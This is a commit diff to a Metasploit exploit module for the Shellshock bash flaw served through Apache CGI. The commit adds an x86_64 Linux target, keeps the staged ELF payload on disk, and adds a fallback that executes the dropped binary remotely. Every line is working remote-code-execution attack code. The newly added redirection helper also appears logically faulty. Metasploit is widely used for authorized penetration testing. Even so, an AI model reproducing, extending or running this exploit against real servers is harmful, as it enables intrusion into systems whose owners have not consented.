Make it more generic, add X86_64 target

jvazquez-r7 · jvazquez-r7 · commit 9245bedf58c9 · 2014-09-25T15:54:20.000-05:00
diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -41,6 +42,13 @@ def initialize(info = {})
               'Arch'            => ARCH_X86,
               'CmdStagerFlavor' => [ :echo, :printf ]
             }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
           ]
         ],
       'DefaultTarget' => 0,
@@ -52,7 +60,7 @@ def initialize(info = {})
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
       OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
-      OptString.new('RPATH', [true, 'Target PATH for binaries uses by the CmdStager', '/bin']),
+      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
       OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
     ], self.class)
   end
@@ -74,12 +82,22 @@ def exploit
       fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
     end
 
-    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'])
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
+
+    # A last chance after the cmdstager
+    # Trying to make it generic
+    unless session_created?
+      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
+    end
   end
 
   def execute_command(cmd, opts)
     cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
-    cmd.gsub!('rm', "#{datastore['RPATH']}/rm")
+
+    if cmd =~ />>/ && first_redirection?
+      cmd.sub!('>>', '>')
+    end
+
     req(cmd)
   end
 
@@ -95,4 +113,13 @@ def req(cmd)
   def marker
     @marker ||= rand_text_alphanumeric(rand(42) + 1)
   end
+
+  def first_redirection?
+    unless @first_redirection && @first_redirection == false
+      @first_redirection = false
+      return true
+    end
+
+    false
+  end
 end
